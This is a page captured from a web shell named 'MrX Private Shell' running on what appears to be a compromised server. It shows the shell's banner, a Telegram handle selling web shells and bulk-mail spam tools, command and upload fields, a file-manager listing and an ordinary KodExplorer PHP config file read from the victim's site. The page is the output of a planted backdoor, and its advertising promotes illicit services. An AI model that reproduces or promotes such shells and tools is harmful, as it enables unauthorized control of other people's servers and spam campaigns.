__  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

[email protected]: ~ $
<?php 
$desktopApps = array(
	'my_computer' => array(
		"type"		=> "app",
		"content"	=> "core.explorer('','".LNG('my_computer')."');",
		"icon"		=> STATIC_PATH."images/file_icon/icon_others/computer.png",
		"name"		=> LNG('my_computer'),
		"menuType"	=> "systemBox menu-default",
		"ext"		=> 'oexe',
		"path"		=> "",
		"resize"	=> 1
	),
	'recycle' => array(
		"type"		=> "app",
		"content"	=> "core.explorer('".KOD_USER_RECYCLE."','".LNG('recycle')."');",
		"icon"		=> STATIC_PATH."images/file_icon/icon_others/recycle.png",
		"name"		=> LNG('recycle'),
		"menuType"	=> "systemBox menu-recycle-button",
		"ext"		=> 'oexe',
		"path"		=> "",
		"resize"	=> 1
	),
	'PluginCenter' => array(
		"type"		=> "app",
		"content"	=> "core.openWindowBig('./index.php?pluginApp/index','".LNG('PluginCenter')."');",
		"icon"		=> STATIC_PATH."images/file_icon/icon_others/plugins.png",
		"name"		=> LNG('PluginCenter'),
		"menuType"	=> "systemBox menu-default",
		"ext"		=> 'oexe',
		"path"		=> "",
		"resize"	=> 1
	),
	'setting' => array(
		"type"		=> "app",
		"content"	=> "core.setting();",
		"icon"		=> STATIC_PATH."images/file_icon/icon_others/setting.png",
		"name"		=> LNG('setting'),
		"menuType"	=> "systemBox menu-default",
		"ext"		=> 'oexe',
		"path"		=> "/",
		"resize"	=> 1
	),
	'appStore' => array(
		"type"		=> "app",
		"content"	=> "core.appStore();",
		"icon"		=> STATIC_PATH."images/file_icon/icon_others/appStore.png",
		"name"		=> LNG('app_store'),
		"menuType"	=> "systemBox menu-default",
		"ext"		=> 'oexe',
		"path"		=> "",
		"resize"	=> 1
	)
);

//管理员插件中心
if(!$GLOBALS['isRoot']){
	unset($desktopApps['PluginCenter']);
}
return $desktopApps;

Filemanager

Name Type Size Permission Actions
api Folder 0750
controller Folder 0750
core Folder 0750
function Folder 0750
kod Folder 0750
model Folder 0750
sdks Folder 0750
template Folder 0750
desktop_app.php File 1.63 KB 0640
Filemanager